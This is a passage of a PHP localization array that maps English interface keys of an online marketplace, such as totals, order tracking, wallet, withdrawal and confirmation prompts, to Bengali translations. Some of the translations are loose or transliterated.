'বিষয়', 'Total' => 'মোট', 'Total Amount' => 'সর্বমোট পরিমাণ', 'Total Amount Sold' => 'মোট পরিমাণ বিক্রি', 'Total Customers' => 'মোট গ্রাহক', 'Total Discount Given' => 'মোট ছাড় দেওয়া', 'Total Earning' => 'মোট উপার্জন', 'Total Earnings' => 'মোট উপার্জন', 'Total Expense' => 'সর্বমোট খরচ', 'Total In-House Products' => 'মোট অভ্যন্তরীণ পণ্য', 'Total Order' => 'মোট অর্ডার', 'Total Orders' => 'মোট অর্ডার', 'Total Price' => 'মোট দাম', 'Total Product' => 'মোট পণ্য', 'Total Products' => 'মোট পণ্য', 'Total Sale' => 'মোট বিক্রয়', 'Total Sales' => 'টোটাল সেল', 'Total Seller' => 'মোট বিক্রেতা', 'Total Seller Products' => 'মোট বিক্রেতা পণ্য', 'Total Stock' => 'মোট স্টক', 'Total Stores' => 'মোট স্টোর', 'Total Transactions' => 'মোট ট্রান্সেকশন', 'Total in Wishlist' => 'উইশ লিস্টয় মোট', 'Total orders of' => 'মোট অর্ডার', 'Total_Amount' => 'সর্বমোট পরিমাণ', 'Total_Amount_Sold' => 'মোট পরিমাণ বিক্রি', 'Total_Balance' => 'মোট ব্যালেন্স', 'Total_Commission_given' => 'মোট কমিশন দেওয়া', 'Total_Coupon_Discount' => 'মোট কুপন ছাড়', 'Total_Delivery_Charge' => 'মোট ডেলিভারি চার্জ', 'Total_Deliveryman' => 'মোট ডেলিভারিকারী', 'Total_Discount_Given' => 'মোট ছাড় দেওয়া', 'Total_Discounted_Amount' => 'মোট ছাড়ের পরিমাণ', 'Total_Earning' => 'মোট উপার্জন', 'Total_Earnings' => 'মোট উপার্জন', 'Total_Expense' => 'সর্বমোট খরচ', 'Total_Expense_Amount' => 'মোট ব্যয়ের পরিমাণ', 'Total_In-House_Products' => 'মোট অভ্যন্তরীণ পণ্য', 'Total_Order' => 'মোট অর্ডার', 'Total_Order_Amount' => 'মোট অর্ডার পরিমাণ', 'Total_Ordered_Product_Price' => 'মোট অর্ডার করা পণ্য মূল্য', 'Total_Orders' => 'মোট অর্ডার', 'Total_Point' => 'মোট পয়েন্ট', 'Total_Points' => 'মোট পয়েন্ট', 'Total_Price_For_This_Product' => 'এই পণ্য জন্য মোট মূল্য', 'Total_Product' => 'মোট পণ্য', 'Total_Product_Amount' => 'মোট পণ্যের পরিমাণ', 'Total_Product_Discount' => 'মোট পণ্য ছাড়', 'Total_Product_Sale' => 'মোট পণ্য বিক্রয়', 'Total_Products' => 'মোট পণ্য', 'Total_Quantity_Sold' => 'মোট পরিমাণ বিক্রি', 'Total_Sale' => 'মোট বিক্রয়', 'Total_Sales' => 'টোটাল সেল', 'Total_Seller' => 'মোট বিক্রেতা', 'Total_Seller_Products' => 'মোট বিক্রেতা পণ্য', 'Total_Shop' => 'মোট দোকান', 'Total_Shop_Earnings' => 'মোট দোকান উপার্জন', 'Total_Store_Earnings' => 'মোট স্টোর উপার্জন', 'Total_Stores' => 'মোট স্টোর', 'Total_Tax' => 'মোট কর', 'Total_amount' => 'সর্বমোট পরিমাণ', 'Total_entries' => 'মোট এন্ট্রি', 'Total_refundable_amount' => 'মোট রিফান্ডযোগ্য পরিমাণ', 'Totals_Cost' => 'মোট ব্যয়', 'Toys Kids & Babies' => 'খেলনা বাচ্চাদের এন্ড বাচ্চাদের', 'Track' => 'ট্র্যাক', 'Track Order' => 'ট্র্যাক অর্ডার', 'Track Order Result' => 'ট্র্যাক অর্ডার ফলাফল', 'Track_Order' => 'ট্র্যাক অর্ডার', 'Track_Order_Result' => 'ট্র্যাক অর্ডার ফলাফল', 'Track_Order_Result ' => 'ট্র্যাক অর্ডার ফলাফল', 'Track_order' => 'ট্র্যাক অর্ডার', 'Transaction' => 'ট্রান্সেকশন', 'Transaction Date' => 'ট্রান্সেকশন তারিখ', 'Transaction Id' => 'ট্রান্সেকশন নাম্বার', 'Transaction Statistics' => 'ট্রান্সেকশন পরিসংখ্যান', 'Transaction Sucessfull' => 'ট্রান্সেকশন সফল', 'Transaction_Date' => 'ট্রান্সেকশন তারিখ', 'Transaction_History' => 'ট্রান্সেকশন সামারি', 'Transaction_Report' => 'ট্রান্সেকশন প্রতিবেদন', 'Transactions' => 'ট্রান্সেকশন', 'Translate' => 'অনুবাদ করুন', 'True' => 'সত্য', 'TrueMake' => 'ট্রুমেক', 'Try after sometime' => 'কিছুক্ষণ পরে চেষ্টা করুন', 'Turn off' => 'বন্ধ কর', 'Turn on' => 'চালু করা', 'Twitter' => 'টুইটার', 'Twitter API Set up Instructions' => 'টুইটার এপিআই নির্দেশাবলী সেট আপ', 'Type' => 'প্রকার', 'Type Answer' => 'উত্তর লেখ', 'Type Question' => 'টাইপ প্রশ্ন', 'Type your message' => 'আপনার মেসেজ টাইপ করুন', 'Type_your_message' => 'আপনার মেসেজ টাইপ করুন', 'UPDATE_ADDRESSES' => 'ঠিকানা আপডেট', 'USE_COUPON' => 'কুপন ব্যবহার করুন', 'Under_this_menu_you_can_setup_all_the_new_features_option_that_are_only_available_for_that_specific_theme.' => 'এই মেনুর অধীনে আপনি সমস্ত নতুন ফীচার বিকল্প সেটআপ করতে পারেন যা কেবলমাত্র সেই নির্দিষ্ট থিমের জন্য এভেইল্যাবলে।', 'Unfollow' => 'আনফলো করা', 'Unfollow_Complete' => 'আনফলো সম্পূর্ণ', 'Unfollow_now' => 'এখন আনফলো করুন', 'Unit' => 'ইউনিট', 'Unit Price' => 'একক দাম', 'Unit is required!' => 'ইউনিট প্রয়োজন!', 'Unit price' => 'একক দাম', 'Unit_Price' => 'একক দাম', 'Unit_Price_:' => 'একক দাম :', 'Unit_price' => 'একক দাম', 'Unpaid' => 'আন পেইড', 'Upcoming_Campaign' => 'আসন্ন প্রচার', 'Update' => 'আপডেট', 'Update & Publish' => 'আপডেট এন্ড পাবলিশ', 'Update Currency' => 'মুদ্রা আপডেট করুন', 'Update Deal' => 'আপডেট ডিল', 'Update Deal of The Day' => 'আপডেট ডিল অফ দি ডে', 'Update Notification' => 'আপডেট নোটিফিকেশন', 'Update Phone' => 'আপডেট ফোন', 'Update delivery-man' => 'আপডেট ডেলিভারি-ম্যান', 'Update option is disabled for demo' => 'আপডেট অপসনটি ডেমো জন্য ডিস্যাবল', 'Update your ব্যাংক তথ্য first!' => 'প্রথমে আপনার ব্যাঙ্কের তথ্য আপডেট করুন!', 'Update_Address' => 'আপডেট ঠিকানা', 'Update_Deliveryman' => 'আপডেট ডেলিভারি', 'Update_Profile' => 'প্রোফাইল আপডেট', 'Update_this_Address' => 'এই ঠিকানা আপডেট করুন', 'Updated_Successfully' => 'সফলভাবে আপডেট হয়েছে', 'Updated_successfully' => 'সফলভাবে আপডেট হয়েছে', 'Updated_unsuccessful' => 'অসফল আপডেট হয়েছে', 'Upload' => 'আপলোড', 'Upload product images' => 'পণ্য চিত্র আপলোড করুন', 'Upload thumbnail' => 'থাম্বনেইল আপলোড করুন', 'Upload_File' => 'ফাইল আপলোড করুন', 'Upload_image' => 'চিত্র আপলোড', 'Upload_product_images' => 'পণ্য চিত্র আপলোড করুন', 'Upload_thumbnail' => 'থাম্বনেইল আপলোড করুন', 'Urgent' => 'জরুরি', 'Use the code to change your password on our secure website' => 'আমাদের নিরাপদ ওয়েবসাইটে আপনার পাসওয়ার্ড পরিবর্তন করতে কোডটি ব্যবহার করুন', 'Used' => 'ব্যবহৃত', 'User' => 'ব্যবহারকারী', 'User_Management' => 'ইউজার ম্যানেজমেন্ট', 'User_Not_Exist' => 'ব্যবহারকারী বিদ্যমান নয়', 'User_details' => 'ব্যবহারকারীর ডিটেলস', 'Username' => 'ব্যবহারকারীর নাম', 'VAT' => 'ভ্যাট', 'VAT/TAX' => 'মুল্য সংযোজন কর', 'Vacation_End' => 'ছুটির শেষ', 'Vacation_Mode' => 'ভ্যাকেশন মোড', 'Vacation_Note' => 'ভ্যাকেশন নোট', 'Vacation_Start' => 'ভ্যাকেশন শুরু', 'Valid OAuth Redirect URIs' => 'ভ্যালিড OAuth URIs পুনর্নির্দেশ', 'Variant' => 'বৈকল্পিক', 'Variant Price' => 'বৈকল্পিক মূল্য', 'Variation' => 'ভ্যারিয়েশন', 'Variations' => 'ভ্যারিয়েশন', 'Vat' => 'ভ্যাট', 'Verification code/ OTP mismatched' => 'ভেরিফিকেশন কোড/ ওটিপি মিলে যায় না', 'Verification_Code' => 'ভেরিফিকেশন কোড', 'Verification_Successfully_Completed' => 'ভেরিফিকেশন সফলভাবে সম্পন্ন হয়েছে', 'Verify' => 'যাচাই করুন', 'Verify your email' => 'আপনার ইমেইল যাচাই করুন', 'View' => 'দেখুন', 'View Order Details' => 'ডিটেলস নির্দেশিকা দেখো', 'View Products' => 'পণ্যগূলো দেখেন', 'View_All' => 'সব দেখ', 'View_All_cart_items' => 'সমস্ত কার্ট আইটেম দেখুন', 'View_Less' => 'কম দেখুন', 'View_More' => 'আরো দেখুন', 'View_User_Message' => 'ব্যবহারকারী মেসেজ দেখুন', 'View_all_cart_items' => 'সমস্ত কার্ট আইটেম দেখুন', 'View_more' => 'আরো দেখুন', 'View_style_updated' => 'স্টাইল আপডেট দেখুন', 'Visit' => 'দেখুন', 'Visit Store' => 'দোকান দর্শন কর', 'Visit_Again' => 'আবার দেখুন', 'Visit_Shop' => 'দোকান দেখুন', 'Visit_Store' => 'দোকান দর্শন কর', 'Vivatiqo' => 'ভিভাতিকো', 'WISHLIST' => 'উইশ লিস্ট', 'Wallet' => 'ওয়ালেট', 'Wallet Amount' => 'ওয়ালেট পরিমাণ', 'Wallet Payments' => 'ওয়ালেট পেমেন্ট', 'Wallet_Payments' => 'ওয়ালেট পেমেন্ট', 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB' => 'ওয়াল্ট্রো ভিভুবুক x515ea ইন্টেল কোর আই 3 1115 জি 4 4 জিবি ডিডিআর 4 র্যাম 512 জিবি', 'Want to add this product' => 'এই পণ্য যুক্ত করতে চান', 'Want to delete this item' => 'এই আইটেমটি মুছতে চান', 'Want_to_Add' => 'যোগ করতে চান', 'Want_to_Block' => 'ব্লক করতে চান', 'Want_to_Change_Default_Language_Status' => 'ডিফল্ট ভাষার স্ট্যাটাস পরিবর্তন করতে চান', 'Want_to_Remove' => 'অপসারণ করতে চান', 'Want_to_Turn_OFF' => 'বন্ধ করতে চান', 'Want_to_Turn_OFF_Coupon_Status' => 'কুপন স্ট্যাটাস বন্ধ করতে চান', 'Want_to_Turn_OFF_Deliveryman_Status' => 'ডেলিভারিম্যান স্ট্যাটাস বন্ধ করতে চান', 'Want_to_Turn_OFF_Employee_Status' => 'কর্মচারীর স্ট্যাটাস অফ করতে চান', 'Want_to_Turn_OFF_Language_Status' => 'ভাষার স্ট্যাটাস বন্ধ করতে চান', 'Want_to_Turn_OFF_Offline_Payment_Methods' => 'অফলাইন পেমেন্ট পদ্ধতিগুলি বন্ধ করতে চান', 'Want_to_Turn_OFF_Support_Ticket_Status' => 'সাপোর্ট টিকিটের স্ট্যাটাস বন্ধ করতে চান', 'Want_to_Turn_ON' => 'চালু করতে চান', 'Want_to_Turn_ON_Coupon_Status' => 'কুপন স্ট্যাটাস চালু করতে চান', 'Want_to_Turn_ON_Deliveryman_Status' => 'ডেলিভারিম্যান স্ট্যাটাস চালু করতে চান', 'Want_to_Turn_ON_Employee_Status' => 'কর্মচারীর স্ট্যাটাস চালু করতে চান', 'Want_to_Turn_ON_Language_Status' => 'ভাষার স্ট্যাটাস চালু করতে চান', 'Want_to_Turn_ON_Offline_Payment_Methods' => 'অফলাইন পেমেন্ট পদ্ধতিগুলি চালু করতে চান', 'Want_to_Turn_ON_Support_Ticket_Status' => 'সাপোর্ট টিকিটের স্ট্যাটাস চালু করতে চান', 'Want_to_Unlock' => 'আনলক করতে চান', 'Want_to_change_the_shipping_responsibility_to_Inhouse' => 'শিপিংয়ের দায়িত্ব ইনহাউসে পরিবর্তন করতে চান', 'Want_to_delete_this_item' => 'এই আইটেমটি মুছতে চান', 'Want_to_disable_the_Maintenance_Mode' => 'রক্ষণাবেক্ষণ মোড ডিস্যাবল করতে চান', 'Want_to_enable_the_Maintenance_Mode' => 'রক্ষণাবেক্ষণ মোড এনাবল করতে চান', 'Want_to_order_your_usuals' => 'আপনার স্বাভাবিক অর্ডার করতে চান', 'Want_to_unfollow_this_shop' => 'এই দোকানটি অনুসরণ করতে চান', 'Warning' => 'সতর্কতা', 'Watches' => 'ঘড়ি', 'We are sorry server is not responding' => 'আমরা দুঃখিত সার্ভার সাড়া দিচ্ছে না', 'We are sorry the page you requested could not be found' => 'আমরা দুঃখিত যে আপনি যে পৃষ্ঠাটি অনুরোধ করেছেন তা খুঁজে পাওয়া যায়নি', 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account' => 'আপনার অর্ডারের প্রতিক্রিয়ায় আমরা আপনাকে এই ইমেলটি প্রেরণ করেছি। আপনি আপনার অ্যাকাউন্টে লগইন করার পরে আপনার অর্ডার স্ট্যাটাস দেখতে এনাবল হবেন', 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel' => 'আপনার একটি নতুন অর্ডার রয়েছে তা অবহিত করতে আমরা আপনাকে এই ইমেলটি প্রেরণ করেছি। আপনি আপনার প্যানেলে লগইন করার পরে আপনার অর্ডারগুলি দেখতে এনাবল হবেন', 'We will email you a temporary code' => 'আমরা আপনাকে একটি অস্থায়ী কোড ইমেল করব', 'We will send email you a temporary code' => 'আমরা আপনাকে একটি অস্থায়ী কোড ইমেল প্রেরণ করব', 'We_Ensure_Quality_Support' => 'আমরা মান সাপোর্ট নিশ্চিত করি', 'We_Ensure_Secure_Transactions' => 'আমরা সুরক্ষিত ট্রান্সেকশন নিশ্চিত করি', 'Wearable' => 'পরিধানযোগ্য', 'Web' => 'ওয়েব', 'Web Config' => 'ওয়েব কনফিগার', 'Web application' => 'ওয়েব অ্যাপ্লিকেশন', 'Web_&_App_Settings' => 'ওয়েব এন্ড অ্যাপ্লিকেশন সেটিংস', 'Webcam' => 'ওয়েবক্যাম', 'Website' => 'ওয়েবসাইট', 'Website Color' => 'ওয়েবসাইটের রঙ', 'Website Favicon' => 'ওয়েবসাইট ফ্যাভিকন', 'Website Header Logo' => 'ওয়েবসাইট শিরোনাম লোগো', 'Website Problem' => 'ওয়েবসাইট সমস্যা', 'Website is under Maintenance' => 'ওয়েবসাইট রক্ষণাবেক্ষণের অধীনে রয়েছে', 'Website problem' => 'ওয়েবসাইট সমস্যা', 'Website_Color' => 'ওয়েবসাইটের রঙ', 'Website_Footer_Logo' => 'ওয়েবসাইট ফুটার লোগো', 'Website_problem' => 'ওয়েবসাইট সমস্যা', 'Weekly' => 'সাপ্তাহিক', 'Weekly Delivery' => 'সাপ্তাহিক ডেলিভারি', 'Welcome To' => 'স্বাগতম', 'Welcome_message' => 'স্বাগত মেসেজ', 'Wellness Fair' => 'সুস্থতা মেলা', 'WhatsApp' => 'হোয়াটসঅ্যাপ', 'Wireless' => 'ওয়্যারলেস', 'Wireless Earbuds' => 'ওয়্যারলেস ইয়ারবডস', 'Wish_List' => 'উইশ লিস্ট', 'Wish_Listed_Products' => 'তালিকাভুক্ত পণ্য উইশ', 'Wishlist' => 'উইশ লিস্ট', 'Wishlisted_Products' => 'উইশ লিস্টেড পণ্য', 'Withdraw' => 'উইথড্র', 'Withdraw Request' => 'অনুরোধ উইথড্র', 'Withdraw Request Table' => 'অনুরোধ টেবিল উইথড্র করুন', 'Withdraw information View' => 'তথ্য দেখুন উইথড্র করুন', 'Withdraw request process' => 'অনুরোধ প্রক্রিয়া উইথড্র করুন', 'Withdraw request sent successfully!' => ' উইথড্র অনুরোধ সাফল্যের সাথে পাঠানো হয়েছে!', 'Withdraw_Request' => 'উইথড্র অনুরোধ', 'Withdraw_Request_Table' => 'অনুরোধ টেবিল উইথড্র করুন', 'Withdrawable Balance' => 'উইথড্রযোগ্য ব্যালেন্স', 'Withdrawable_balance' => 'উইথড্রযোগ্য ব্যালেন্স', 'Withdrawal_Method' => 'উইথড্র পদ্ধতি', 'Withdrawal_Methods' => 'উইথড্র পদ্ধতি', 'Withdrawal_method_List' => 'উইথড্র পদ্ধতি তালিকা', 'Withdrawble Balance' => 'উইথড্র ব্যালেন্স', 'Withdrawble_Balance' => 'উইথড্র ব্যালেন্স', 'Women s fashion' => 'মহিলাদের ফ্যাশন', 'Women s long-sleeve lightweight french terry fleece quarter-zip top' => 'মহিলাদের দীর্ঘ-হাতা হালকা ওজনের ফরাসি টেরি ফ্লাইস কোয়ার্টার-জিপ শীর্ষ', 'Write your message here...' => 'আপনার মেসেজ এখানে লিখুন ...', 'Write_something' => 'কিছু লিখুন', 'Write_something ' => 'কিছু লিখুন', 'XID' => 'Xid', 'Yes' => 'হ্যাঁ', 'Yes Change it' => 'হ্যাঁ এটি পরিবর্তন করুন', 'Yes Change it!' => 'হ্যাঁ এটি পরিবর্তন করুন!', 'Yes delete it' => 'হ্যাঁ এটি মুছবেন', 'Yes delete it!' => 'হ্যাঁ এটি মুছবেন!', 'Yes_delete_it' => 'হ্যাঁ এটি মুছবেন', 'You already subcribed this site!!' => 'আপনি ইতিমধ্যে এই সাইটটি সাবস্ক্রাইব করেছেন !!', 'You can download the example file to understand how the data must be filled' => 'ডেটা কীভাবে পূরণ করতে হবে তা বুজতে আপনি উদাহরণ ফাইলটি ডাউনলোড করতে পারেন', 'You can download the example file to understand how the data must be filled.' => 'ডেটা কীভাবে পূরণ করতে হবে তা বুজতে আপনি উদাহরণ ফাইলটি ডাউনলোড করতে পারেন।', 'You can get brand and category id from their list' => 'আপনি তাদের তালিকা থেকে ব্র্যান্ড এন্ড ক্যাটাগরি আইডি পেতে পারেন', 'You can get brand and category id from their list please input the right ids' => 'আপনি তাদের তালিকা থেকে ব্র্যান্ড এন্ড ক্যাটাগরি আইডি পেতে পারেন দয়া করে ডান আইডিগুলি ইনপুট করুন', 'You can upload your product images in product folder from gallery' => 'আপনি গ্যালারী থেকে পণ্য ফোল্ডারে আপনার পণ্য চিত্রগুলি আপলোড করতে পারেন', 'You can upload your product images in product folder from gallery and copy image`s path' => 'আপনি গ্যালারী থেকে পণ্য ফোল্ডারে আপনার পণ্যের চিত্রগুলি আপলোড করতে পারেন এন্ড চিত্রের পথটি অনুলিপি করতে পারেন', 'You have new order Check Please' => 'আপনার নতুন অর্ডার চেক আছে দয়া করে', 'You order has been confirmed and will be shipped according to the method you selected!' => 'আপনার অর্ডার নিশ্চিত হয়ে গেছে এন্ড আপনার নির্বাচিত পদ্ধতি অনুসারে প্রেরণ করা হবে!', 'You will not be able to revert this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'You wont be able to revert this!' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না!', 'You_May_Also_Like' => 'আপনিও পছন্দ করতে পার', 'You_can_check_our' => 'আপনি চেক করতে পারেন', 'You_can_track_your_order_by_clicking_the_below_button' => 'আপনি নীচের বোতামটি ক্লিক করে আপনার অর্ডারটি ট্র্যাক করতে পারেন', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'আপনি আপাতত এই দোকান থেকে কার্টে পণ্য যুক্ত করতে পারবেন না', 'You_want_to_change_refund_status!!' => 'আপনি রিফান্ডের স্ট্যাটাস পরিবর্তন করতে চান !!', 'You_want_to_remove_all_items_from_cart!!' => 'আপনি কার্ট থেকে সমস্ত আইটেম অপসারণ করতে চান !!', 'You_will not_be_able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'You_will_not_be_able_to_revert_this' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না', 'You_will_not_be_able_to_revert_this!' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না!', 'You_wont_be_able_to_revert_this!' => 'আপনি এটি ফিরিয়ে দিতে এনাবল হবেন না!', 'Your Earnings' => 'আপনার উপার্জন', 'Your Email Address' => 'আপনার ইমেইল ঠিকানা', 'Your Message Send Successfully' => 'আপনার মেসেজ সফলভাবে প্রেরণ', 'Your existing session token does not authorize you any more' => 'আপনার বিদ্যমান সেশন টোকেন আপনাকে আর অনুমোদন দেয় না', 'Your first name' => 'আপনার নামের প্রথম অংশ', 'Your order ID' => 'আপনার অর্ডার আইডি', 'Your subscription successfully done!!' => 'আপনার সাবস্ক্রিপশন সফলভাবে সম্পন্ন হয়েছে !!', 'Your_Most_Searching' => 'আপনার সর্বাধিক সার্চ', 'Your_Order_is_Completed' => 'আপনার অর্ডার শেষ হয়েছে', 'Your_Privacy_Matter' => 'আপনার প্রাইভেসি বিষয়', 'Your_account_deleted_successfully!!' => 'আপনার অ্যাকাউন্ট সফলভাবে মুছে ফেলা হয়েছে !!', 'Your_order' => 'আপনার অর্ডার', 'Your_order_ID' => 'আপনার অর্ডার আইডি', 'Your_password_must_be_at_least_8_characters' => 'আপনার পাসওয়ার্ড অবশ্যই কমপক্ষে 8 টি অক্ষর হতে হবে', 'Your_shop_address' => 'আপনার দোকানের ঠিকানা', 'Youtube video link' => 'ইউটিউব ভিডিও লিঙ্ক', 'Z-A' => 'জেড-এ', 'Z_A' => 'জেড এ', 'Z_to_A' => 'জেড টু এ', 'Z_to_A_Order' => 'জেড টু এ অর্ডার', 'Zip Code' => 'জিপ কোড', 'Zip_Code' => 'জিপ কোড', '[Apple_Deveveloper_Account_Name - Team_ID]' => '[অ্যাপল ডেভিভেলার অ্যাকাউন্টের নাম - টিম আইডি]', '[This is the Service Key ID file and also after AuthKey_ that is the Key ID]' => '[এটি পরিষেবা কী আইডি ফাইল এন্ড অ্যাথির পরেও এটি কী আইডি]', '_Color_Available' => 'রঙ এভেইল্যাবলে', '_again_ _you_will_see_the_saved_data.' => 'আবার আপনি সংরক্ষিত ডেটা দেখতে পাবেন।', '_as_the_Digital_Payment_method' => 'ডিজিটাল পেমেন্ট পদ্ধতি একাউন্টে', '_as_the_SMS_Gateway' => 'এসএমএস গেটওয়ে একাউন্টে', '_pc' => 'পিসি', '_points_required_to_convert_into_currency' => 'মুদ্রায় রূপান্তর করতে প্রয়োজনীয় পয়েন্টগুলি', 'a_test_mail_will_be_send_to_your_email_to' => 'একটি চেকর মেল আপনার ইমেলটিতে প্রেরণ করা হবে', 'a_test_mail_will_be_sent_to_your_email' => 'আপনার ইমেলটিতে একটি টেস্ট মেল প্রেরণ করা হবে', 'a_to_z_order' => 'এ টু জেড অর্ডার', 'a_z' => 'এ জেড', 'about_Company' => 'কোম্পানী সম্পর্কে', 'about_Our_Company' => 'আমাদের প্রতিষ্ঠান সম্পর্কে', 'about_Us' => 'এবাউট আস', 'about_company' => 'কোম্পানী সম্পর্কে', 'about_us' => 'এবাউট আস', 'ac_number' => 'এসি নম্বর', 'accept_All_Cookies' => 'সমস্ত কুকিজ গ্রহণ করুন', 'access_denied' => 'অ্যাক্সেস ডিনাইড', 'access_denied!!' => 'অ্যাক্সেস ডিনাইড !!', 'access_token' => 'অ্যাক্সেস টোকেন', 'according_to_theme' => 'থিম অনুযায়ী', 'account&shipping_info' => 'অ্যাকাউন্ট এন্ড শিপিংয়ের তথ্য', 'account_&_shipping_info' => 'অ্যাকাউন্ট এন্ড শিপিংয়ের তথ্য', 'account_Information' => 'একাউন্টের তথ্য', 'account_Number' => 'একাউন্ট নাম্বার', 'account_email_not_verified' => 'অ্যাকাউন্ট ইমেল যাচাই করা হয়নি', 'account_has_been_deleted_you_can_not_change_the_status' => 'অ্যাকাউন্ট মুছে ফেলা হয়েছে আপনি স্ট্যাটাস পরিবর্তন করতে পারবেন না', 'account_holder_name' => 'একাউন্ট দাতার নাম', 'account_information' => 'একাউন্টের তথ্য', 'account_name' => 'একাউন্টের নাম', 'account_no' => 'একাউন্ট নাম্বার', 'account_number' => 'একাউন্ট নাম্বার', 'account_phone_not_verified' => 'অ্যাকাউন্ট ফোন যাচাই করা হয়নি', 'accounts' => 'অ্যাকাউন্ট', 'action' => 'কর্ম', 'action_disabled' => 'অ্যাকশন ডিস্যাবল', 'activate' => 'সক্রিয়', 'activate_maintenance_mode' => 'সক্রিয় রক্ষণাবেক্ষণ মোড', 'activated_successfully' => 'সফলভাবে সক্রিয়', 'activation failed' => 'অ্যাক্টিভেশন ব্যর্থ হয়েছে', 'activation_keys' => 'অ্যাক্টিভেশন কী', 'active' => 'সক্রিয়', 'active_Products' => 'সক্রিয় পণ্য', 'active_Status' => 'সক্রিয় স্ট্যাটাস', 'active_products' => 'সক্রিয় পণ্য', 'active_sellers' => 'সক্রিয় বিক্রেতারা', 'active_status' => 'সক্রিয় স্ট্যাটাস', 'add' => 'যোগ করুন', 'add funds to wallet' => 'ওয়ালেটে ফান্ড যুক্ত করুন', 'add_Address' => 'ঠিকানা যোগ করুন', 'add_Delivery_Man' => 'ডেলিভারি ম্যান যুক্ত করুন', 'add_Domain_(For_ex= _demo.6amtech.com)' => 'ডোমেন যুক্ত করুন (এক্সাম্পল জন্য=> ডেমো .6amtech.com)', 'add_FAQ' => 'Add FAQ', 'add_Fields' => 'ক্ষেত্র যুক্ত করুন', 'add_Fund' => 'ফান্ড যুক্ত করুন', 'add_Fund_to_Wallet' => 'ওয়ালেটে ফান্ড যুক্ত করুন', 'add_Help_Topic' => 'Add Help Topic', 'add_Meta_Image_in' => 'মেটা চিত্র যুক্ত করুন', 'add_New' => 'নতুন যোগ করুন', 'add_New_Method' => 'নতুন পদ্ধতি যুক্ত করুন', 'add_New_Product' => 'নতুন পণ্য যুক্ত করুন', 'add_New_Seller' => 'নতুন বিক্রেতা যুক্ত করুন', 'add_Offline_Payment_Method' => 'অফলাইন পেমেন্ট পদ্ধতি যুক্ত করুন', 'add_Product' => 'পণ্য যুক্ত করুন', 'add_Refund_Amount_to_Wallet' => 'ওয়ালেট রিফান্ডের পরিমাণ যুক্ত করুন', 'add_Shipping' => 'শিপিং যোগ করুন', 'add_a_abel_(Ex= _abc_company)' => 'একটি আবেল যুক্ত করুন (এক্সাম্পল=> এবিসি সংস্থা)', 'add_a_label_(Ex= _abc_company)' => 'একটি লেবেল যুক্ত করুন (এক্সাম্পল=> এবিসি সংস্থা)', 'add_address' => 'ঠিকানা যোগ করুন', 'add_banner' => 'ব্যানার যুক্ত করুন', 'add_color-wise_product_images_here' => 'এখানে রঙ-ভিত্তিক পণ্য চিত্র যুক্ত করুন', 'add_fund' => 'ফান্ড যুক্ত করুন', 'add_fund_by_admin' => 'অ্যাডমিন দ্বারা ফান্ড যুক্ত করুন', 'add_fund_by_customer' => 'গ্রাহক দ্বারা ফান্ড যুক্ত করুন', 'add_fund_by_from_secured_digital_payment_gateways' => 'সুরক্ষিত ডিজিটাল পেমেন্ট গেটওয়ে থেকে ফান্ড যুক্ত করুন', 'add_fund_to_wallet' => 'ওয়ালেটে ফান্ড যুক্ত করুন', 'add_fund_to_wallet_success' => 'ওয়ালেট সাফল্যে ফান্ড যুক্ত করুন', 'add_main_banner' => 'প্রধান ব্যানার যুক্ত করুন', 'add_method' => 'পদ্ধতি যুক্ত করুন', 'add_more_for_free_delivery' => 'বিনামূল্যে ডেলিভারির জন্য আরও যুক্ত করুন', 'add_new' => 'নতুন যোগ করুন', 'add_new_address' => 'নতুন ঠিকানা যোগ করুন', 'add_new_attribute' => 'নতুন ফীচার যুক্ত করুন', 'add_new_customer' => 'নতুন গ্রাহক যুক্ত করুন', 'add_new_delivery_man' => 'নতুন ডেলিভারি ম্যান যুক্ত করুন', 'add_new_deliveryman' => 'নতুন ডেলিভারিকারী যুক্ত করুন', 'add_new_language' => 'নতুন ভাষা যুক্ত করুন', 'add_new_notification' => 'নতুন নোটিফিকেশন যুক্ত করুন', 'add_new_order_wise_shipping' => 'নতুন অর্ডার ওয়াইজ শিপিং যুক্ত করুন', 'add_new_product' => 'নতুন পণ্য যুক্ত করুন', 'add_new_seller' => 'নতুন বিক্রেতা যুক্ত করুন', 'add_new_ticket' => 'নতুন টিকিট যোগ করুন', 'add_order_wise_shipping' => 'অর্ডার ওয়াইজ শিপিং যুক্ত করুন', 'add_popup_banner' => 'পপআপ ব্যানার যুক্ত করুন', 'add_secondary_banner' => 'গৌণ ব্যানার যুক্ত করুন', 'add_the_Stock_Quantity_of_this_product_that_will_be_visible_to_customers' => 'এই পণ্যটির স্টক পরিমাণ যুক্ত করুন যা গ্রাহকদের কাছে দৃশ্যমান হবে', 'add_the_YouTube_video_link_here._Only_the_YouTube-embedded_link_is_supported' => 'ইউটিউব ভিডিও লিঙ্কটি এখানে যুক্ত করুন। কেবল ইউটিউব-এমবেডেড লিঙ্কটি সমর্থিত', 'add_the_discount_amount_in_percentage_or_a_fixed_value_here' => 'শতাংশে ছাড়ের পরিমাণ বা এখানে একটি নির্দিষ্ট মান যুক্ত করুন', 'add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly' => 'এই পণ্যটির জন্য পণ্য সার্চ ট্যাগ যুক্ত করুন যা গ্রাহকরা দ্রুত সার্চ করতে ব্যবহার করতে পারেন', 'add_the_purchase_price_for_this_product' => 'এই পণ্যটির জন্য ক্রয়ের মূল্য যুক্ত করুন', 'add_to_Cart' => 'কার্টে যোগ করুন', 'add_to_cart' => 'কার্টে যোগ করুন', 'add_to_compare' => 'কম্পেয়ার যোগ করুন', 'add_to_wishlist' => 'চাহিদাপত্রে যোগ করা', 'add_valid_data' => 'ভ্যালিড ডেটা যুক্ত করুন', 'add_your_products_thumbnail_in' => 'আপনার পণ্যের থাম্বনেইল যুক্ত করুন', 'added_to_cart_successfully!' => 'সফলভাবে কার্টে যুক্ত!', 'added_via_payment_method' => 'অর্থ পেমেন্ট পদ্ধতির মাধ্যমে যুক্ত', 'additional' => 'অতিরিক্ত', 'additional_information' => 'অতিরিক্ত তথ্য', 